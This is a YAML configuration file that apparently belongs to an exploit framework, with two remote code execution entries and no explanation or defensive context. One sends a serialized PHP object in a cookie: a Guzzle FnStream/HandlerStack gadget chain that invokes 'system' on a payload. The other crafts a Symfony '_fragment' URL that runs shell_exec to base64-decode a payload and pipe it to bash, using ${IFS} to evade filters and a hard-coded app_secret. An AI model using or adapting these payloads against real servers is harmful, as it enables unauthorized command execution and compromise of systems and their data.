php_cookie_deserialize:
  method: requests.get
  args:
    url: "{settings.url}"
    timeout: "{settings.timeout}|int"
    verify: False
    cookies:
      unsafe_cookie: "a:2:{i:7%3BO:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"%00GuzzleHttp\\Psr7\\FnStream%00methods\"%3Ba:1:\
        {s:5:\"close\"%3Ba:2:{i:0%3BO:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"%00GuzzleHttp\\HandlerStack%00handler\"%3Bs:\
        {PAYLOAD_LENGTH}:\"{PAYLOAD}\"%3Bs:30:\"%00GuzzleHttp\\HandlerStack%00stack\"%3Ba:1:{i:0%3Ba:1:{i:0%3Bs:6:\"system\"%3B}}\
        s:31:\"%00GuzzleHttp\\HandlerStack%00cached\"%3Bb:0%3B}i:1%3Bs:7:\"resolve\"%3B}}s:9:\"_fn_close\"%3B\
        a:2:{i:0%3Br:5%3Bi:1%3Bs:7:\"resolve\"%3B}}i:7%3Bi:7%3B}"
symfony_fragments:
  method: exploits.symfony.fragments
  args:
    url_template: "{settings.url}/_fragment?_path=_controller%3Dshell_exec%26cmd%3Decho%24%7BIFS%7D%22\
          ##PAYLOAD##%22%24%7BIFS%7D%7C%24%7BIFS%7Dbase64%24%7BIFS%7D-d%24%7BIFS%7D%7C%24%7BIFS%7Dbash"
    timeout: "{settings.timeout}|int"
    payload: "{PAYLOAD}"
    app_secret: IamImpossibleToHack
